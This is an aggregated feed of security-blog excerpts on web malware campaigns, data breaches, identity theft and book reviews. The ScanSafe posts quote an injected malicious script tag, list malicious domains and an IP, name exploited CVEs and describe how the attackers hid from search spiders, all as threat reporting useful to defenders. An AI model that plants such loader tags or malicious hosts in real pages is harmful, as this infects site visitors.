http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is: script src=http://ww.robint.us/u.js Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007. On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May.
* 16196 unique malicious domains.
* The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
* Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
* Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
* Gumblar was the second most prevalent Web malware encountered, at 7%.
* Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010 (an asterisk marks domains related to attacks against GoDaddy-hosted websites):
holasionweb.com* - 7%
www.sitepalace.com - 3%
losotrana.com* - 2%
indesignstudioinfo.com* - 2%
kdjkfjskdfjlskdjf.com* - 2%
easfindnex.org - 2%
findermar.org - 2%
76.73.33.109 - 2%
findrasup.org - 1%
zettapetta.com* - 1%
Top Ten Web Malware, May 2010:
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including 1 & 1, DreamHost, In2Net, Hostway, Media Temple, ServerBeach and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites.
Google / WordPress Pharma Hacks. In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post, and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised) site that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used.
Grepad.com Attacks. The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit pharmaceuticals, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attempted in order to download this malware. A list of observed exploits can be found in this blog post.
Commonalities Between Attacks. In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address range, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur.
The Million Dollar Question: How? The why is easy to answer: attackers want to make money. The how is a bit more cloudy. It appears the attacker is able to read wp-config.php, which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-options table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appears to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com which attempts to exploit a series of vulnerabilities. Observed exploits include:
* Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
* Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
* Office OCX OpenWebFile (BID-33243)
* Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
* Hummingbird PerformUpdateAsync (CVE-2008-4728)
* Peachtree ExecutePreferredApplication (CVE-2008-4699)
* C6 Messenger propDownloadUrl (CVE-2008-2551)
* Internet Explorer memory corruption (MS09-002)
The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks has also been targeted against WordPress-published sites hosted by GoDaddy.

==> New record in ridiculous password rules

http://blogs.securiteam.com/index.php/feed/ The US Treasury wants to show how much they care about security. To show how much, here are their password guidelines: Must be at least 8 characters long. Must contain at least one uppercase letter. Must contain at least one lowercase letter. Must contain at least one numeric character. Must contain at least one special [...]

==> More bad news for risk management

http://blogs.securiteam.com/index.php/feed/ Overconfidence makes you successful in business. Not just confidence, mind you, overconfidence. Add in the Dunning-Kruger effect, and the Peter Principle, and you start to realize why all those huge banks keep failing …

==> REVIEW: “Learning from the Octopus”, Rafe Sagarin

http://blogs.securiteam.com/index.php/feed/ BKLNFOCT.RVW 20120714 “Learning from the Octopus”, Rafe Sagarin, 2012, 978-0-465-02183-3, U$26.99/C$30.00 %A Rafe Sagarin %C 387 Park Ave. South, New York, NY 10016-8810 %D 2012 %G 978-0-465-02183-3 0-465-02183-2 %I Basic Books/Perseus Books Group %O U$26.99/C$30.00 800-810-4145 www.basicbooks.com %O http://www.amazon.com/exec/obidos/ASIN/0465021832/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0465021832/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0465021832/robsladesin03-20 %O Audience n+ Tech 1 Writing 2 (see revfaq.htm for explanation) %P 284 [...]

==> Bridge tolling account and spam

http://blogs.securiteam.com/index.php/feed/ Recently one of the bridges in my area was replaced by a new one. The new Port Mann Bridge is, at the moment, apparently the widest in the world, and will relieve congestion on the existing bridge, which has been a huge bottleneck for years. (Why do I keep flashing on an old saying about [...]

==> Security Transcends Slogans … or not …

http://blogs.securiteam.com/index.php/feed/ I have just got off the phone with a marketroid. In the course of our conversation (no, I usually don't talk to them, but this turned out to be a special case), I was explaining to her about ISC2 and the CISSP. She was puzzled by an annotation on my file with her company, and [...]

==> Lockitron

http://blogs.securiteam.com/index.php/feed/ Keyless Entry Using Your Phone. 1) I keep telling people, the next security risk is the next technology that is there solely for “convenience.” 2) So, your credit cards are going to be in your cell, your bank access is going to be in your cell, your car keys are going to be in your [...]

==> Child abandonment

http://blogs.securiteam.com/index.php/feed/ There are always two sides (and maybe more) to every story, but: Police called to a scene where children were reportedly abandoned. Police arrive to find children on a suburban street, and the mother watching from the porch. So the police take the mother to jail.

==> Biblical epics return!

http://blogs.securiteam.com/index.php/feed/ (Sorry, nothing to do with security in this one.) Hollywood has rediscovered the Bible as movie source material. (Probably because it’s in the public domain, and saves costs.) In production is “Noah,” which stars Russell Crowe as someone mumbling about God telling him to build a boat, and then beating up his neighbours when they [...]

==> Not the bad news you thought you were reporting …

http://blogs.securiteam.com/index.php/feed/ "The 2012 Norton Cybercrime Report, released Wednesday, says more than 46 per cent of Canadians have reported attempts by hackers to try to obtain personal data over the past 12 months," according to the Vancouver Sun. Well, since I see phishing every single day, and malware a few times per week, what this survey [...]

==> Hiring droids – "Would you like coffee breaks with that?"

http://blogs.securiteam.com/index.php/feed/ What is true of teachers is also true for recruiters. I am old enough to have gone through group interviews, hostile interviews, video interviews, multi-part phone interviews, questionnaire interviews, weird question interviews, "what do you want to be when you grow up" interviews, and all the other "latest and greatest" ideas that swept through HR-land [...]

==> Teacherless classrooms?

http://blogs.securiteam.com/index.php/feed/ Someone has made yet another prediction that teachers will shortly be replaced by technology. Teacherless classrooms are, apparently, the way of the future. I recall this prediction being made, to great fanfare, thirty years ago. I was, at the time, a public school teacher, and at a conference on science education. The first speaker of [...]

==> Canada’s Fastest Network! (Yeah, right.)

http://blogs.securiteam.com/index.php/feed/ I’ve mentioned before that I use Shaw as my ISP at home. Right at the moment, they have an advertising campaign that claims they are, or have, Canada’s fastest network. Now, I’m willing to believe that Shaw is not being deliberately mendacious or misleading. There is probably someplace, or some part of Shaw’s network, that [...]

==> Securing the Software Development Environment

http://blogs.securiteam.com/index.php/feed/ In the February 2012 edition of Computer, a sidebar to an article on “Web Application Vulnerabilities” asks the question: “Why don’t developers use secure coding practices?” [1] The sidebar provides the typical cliches that programmers feel constrained by security practices and suggests that additional education will correct the situation. Another magical solution addressing security concerns [...]

==> The Evolution of a Technical Information Professional

http://blogs.securiteam.com/index.php/feed/ During my years of work as a consultant and trainer in the information security world, I’ve noticed a few patterns that usually exist in those who do very well in the industry vs those who just make it by. I decided to draft this article to share some of the key elements and more importantly, [...]

==> REVIEW: “Managing the Human Factor in Information Security”, David Lacey

http://blogs.securiteam.com/index.php/feed/ BKMHFIIS.RVW 20120216 “Managing the Human Factor in Information Security”, David Lacey, 2009, 978-0-470-72199-5, U$50.00/C$55.00/UK#29.99 %A David Lacey %C 5353 Dundas Street West, 4th Floor, Etobicoke, ON M9B 6H8 %D 2009 %G 978-0-470-72199-5 0-470-72199-5 %I John Wiley & Sons, Inc. %O U$50.00/C$55.00/UK#29.99 416-236-4433 fax: 416-236-4448 %O http://www.amazon.com/exec/obidos/ASIN/0470721995/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0470721995/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0470721995/robsladesin03-20 %O Audience n- Tech 1 Writing [...]

==> SMS Apple (malware) spam on Bell Mobility (Canada)

http://blogs.securiteam.com/index.php/feed/ SMS spam on Bell seems to have suddenly jumped. On Tuesday, both Gloria and I got spam saying we had won something from Apple. Today, we both got similar spam. Today’s message came “from” 240-393-8527. It asked us to visit hxxp://www.apple.com.ca.llhf.net [1] Neither F-Secure nor VirusTotal had anything to say about it, but it is [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows one to perform a man-in-the-middle of the whole network traffic flowing through the device. The idea behind this PCI card is that once it is plugged into a computer the whole traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us to get a probability showing how likely an application is to have a vulnerability during its lifetime and also will give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 MB). Do not hesitate to contact us if you need further information.

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to make a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows anyone to locate any Timbuktu user just by knowing their email address. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted, and many interesting discussions have emerged as a result. It's worth noting that there is nothing especially exciting in the approach used to break the Google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek (curious note: according to Secunia, it is the first advisory for that vendor) where a piece of code that was originally intended to be used by the engineers only ends up being compiled into the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog; anyway, I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from the spammers' point of view is really profitable and surely more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of the importance of cyber security. Although conventionally it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). Thirty record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group "Anonymous" on Sunday, Christmas Day, claimed it had stolen thousands of credit card numbers and personal information of clients of the U.S.-based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every player's account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers' Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails alerting them that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor, claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach that targeted their network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian Children's Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of Children and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fakes Legitimate Apple Emails, Steals Victims' IDs And Passwords

http://cyberinsecure.com/feed/ A phishing campaign which exploits the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates the alerts customers receive when the company notifies them of changes to their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> About the ITRC

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml

==> Public Wifi Survey Whitepaper Released

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity Theft and Public WiFi Linked in Consumer Minds. The Identity Theft Resource Center (ITRC), a nationally recognized non-profit focusing on identity theft and related issues, has just published a whitepaper containing the results of its Public WiFi Usage Survey, which aimed to measure the level of knowledge and usage of public WiFi.

==> FBI Fraud Alert

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Banks Warned of Cyber Threat by FBI. The Federal Bureau of Investigation, the Financial Services Information Sharing and Analysis Center, and the Internet Crime Complaint Center have jointly issued a Fraud Alert to financial institutions warning them of alarming trends in unauthorized wire transfers overseas in amounts ranging from $400,000 to $900,000. The Fraud Alert explains ...

==> It's a Boom Time for Mortgage Fraud

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml New Schemes, Reporting Requirements Add to Surge. Mortgage fraud investigations are in the spotlight. What's behind the surge, and what must financial institutions do to improve how they detect, prevent and report these costly schemes?

==> Protect Your Identity Week 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml ID Theft Protection on the Go

==> FraudAvengers.org Newsletter

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml FraudAvengers.org has released their September newsletter. The theme of the newsletter is Mobile Phone Security.

==> Breaches: Knowing Less and Less

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recorded 213 breaches for the first six months of 2012, with an astonishing 63.4% of them having no reported attributes. This represents a doubling in the number of data breaches which did not have any type of attributes identified for the incident, giving the public little or no insight into what happened. This trend makes it obvious that, with few exceptions, there is minimal transparency when it comes to reporting breaches.

==> AZ Identity Theft Coalition

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity theft is problematic across the nation; being ranked fourth in the country for reports of identity theft means that Arizona is no stranger to this crime. The Office of the Arizona Attorney General has been instrumental in combating this crime through the creation of, and collaboration with, various organizations and state agencies.

==> IRS Unveils ID Theft Program

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS has implemented a new pilot program designed to aid law enforcement in obtaining tax return data to help investigate and prosecute specific cases of identity theft. This program is currently limited to coordinated efforts within the state of Florida. How it works: State and local law enforcement officials with evidence of identity theft involving fraudulently filed federal tax returns will have the victims complete a special IRS disclosure form.

==> NCSAM 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The National Cyber Security Alliance (NCSA), a non-profit public-private partnership focused on cybersecurity awareness and education for all digital citizens, today announced the launch of its National Cyber Security Awareness Month (NCSAM) Web Portal in advance of the 9th annual month of awareness held each October. The portal offers an abundance of online safety tips and resources: http://www.staysafeonline.org/ncsam/

==> Breaches 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of October 16, 2012, the ITRC has reported 335 breaches for 2012. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> IC3 Scam Alerts

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Internet Crime Complaint Center has issued its recent scam warnings. These include the latest trends in cybercrime and developments on existing scams.

==> Data Breach Facts Unlocked

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml According to Experian, hacking is now the main cause of data breaches.

==> Parenting and Social Media Survey

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recently conducted the Parenting and Social Media Survey to measure the actions of parents in regard to their children's usage of social media. Mobile device usage by children was also minimally covered in the study. The ITRC conducted this survey in order to better understand how parents try to keep their children safe while using social media.

==> Identity Theft up 13% in 2011

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml According to The 2012 Identity Fraud Report: Social Media and Mobile Forming the New Fraud Frontier, released by Javelin Strategy & Research, identity theft increased by 13% in 2011.

==> Way to shred!

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Our wonderful friend Dawn heading out to a community event with a shredder that one lucky person will go home with! Shredding is a great way to protect yourself from identity theft!

==> Check Fraud Still a Problem

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml So much attention has been paid to emerging banking technology, but it is still important for banks to pay attention to check fraud. BankInfoSecurity.com tells us that check fraud remains one of the top threats in their Faces of Fraud survey 2012.

==> Utah AG launches program to protect children from ID theft

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Utah has launched a new program to help protect children from identity theft. Utah Attorney General Mark Shurtleff and TransUnion have announced the Child Identity Protection Program (CIP), which features a secure online site through which Utah parents and guardians can register their minor children for protection at no cost.

==> California AG Launches New Privacy Enforcement and Protection Unit

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml California Attorney General Kamala D. Harris has announced the creation of the Privacy Enforcement and Protection Unit. The organization will focus on protecting consumer and individual privacy through civil prosecution under state and federal privacy laws. For more information, read CALPIRG's most recent blog on the matter.

==> Canadian Identity Theft Support Centre

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Victims of identity theft in Canada now have a new resource! The Canadian Identity Theft Support Centre recently opened in Vancouver. We are pleased to say we took part in training these wonderful individuals and can't wait to see the wonderful work they do!

==> Breach Response: Reputational Risk

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A recent article and podcast from BankInfoSecurity states that data breaches have an increasingly large effect on a company's reputation.

==> New Survey on Security

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A new survey from BankInfoSecurity.com shows a sizable gap between Americans' online security perceptions and their actual practices: many don't follow common cyber security best practices, and mobile users are the most vulnerable.

==> Facebook Survey results

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recently conducted a survey on Facebook usage trends. The results are out and can be found on the Consumer Federation of America's site.

==> Best Practices for Mobile Device Use

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The constant use of smartphones in everyday life is a growing concern when it comes to the type and amount of personal information stored on them. The information contained on a smartphone is coveted by identity thieves. There are some precautions that smartphone owners can take to reduce the risk associated with the use of these mobile devices.

==> A Special Opportunity for ITRC Visitors

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Private Communications Corporation (PCC) was created because, like the ITRC, we take your privacy seriously. Because PCC believes in the work the ITRC does, it would like to offer you the unique opportunity to protect your data online, anywhere in the world, at any time.

==> New Image Based Anti-Phishing Technology

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Confident Technologies has put out a helpful video explaining the use of image-based verification and how it can be improved. This technology is helping consumers avoid phishing scams and identity theft.

==> My Free ChildScan

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A child is an easy target for identity thieves because the crime can go undetected for years. Now parents have a safe and secure way to determine if someone is using their child's Social Security number.

==> ITRC Monthly Case Load

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Total August 2012 ITRC Victim and Consumer Contacts: 819. Total 2012 year-to-date Contacts: 6,170.

==> Facebook Crimes on the Rise

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Experts are coming out with a scary stance that Facebook crimes are on the rise. This is putting users at more risk than ever before.

==> Top 13 Things Taxpayers Should Know

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The new IRS/ITRC Solution 34 - Top 13 Things Every Taxpayer Should Know about Identity Theft - was provided to the ITRC by the Internal Revenue Service (IRS) Office of Identity Protection. This, along with the new IRS/ITRC Fact Sheet 143, gives the consumer or victim a comprehensive look...

==> Dangerous Side of Online Romance Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IC3 is warning the public to be wary of romance scams in which scammers target individuals who search for companionship or romance online. Someone you know may be "dating" someone online who may appear to be decent and honest. However, be forewarned...

==> Where Are You?

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Trend Micro Inc. has announced the winners of their second annual "What's Your Story" international video contest that empowers youth to be leaders in educating others about being safe online. The grand prize goes to a team of two young filmmakers from Westerville, OH whose video "Where Are You?" is austere in its production, yet delivers a compelling message to youth everywhere. The video challenges youth to make positive choices online.

==> Breaches 2011

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of December 31, the ITRC had reported 419 breaches for 2011. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> New U.S. Postal Service website

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The U.S. Postal Service is embarking on a new effort to help people protect themselves against identity theft and fraudulent schemes. It has launched a new website featuring free videos to educate people about all kinds of scams. It covers everything from identity theft and Internet fraud to work-at-home, foreign lottery and fake check scams.

==> RFID and Credit Cards

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml To Blink or Not to Blink... A great deal of public discussion is currently going on regarding credit cards which have RFID technology. Many people don't know what it is, how it works, or what it is for.

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

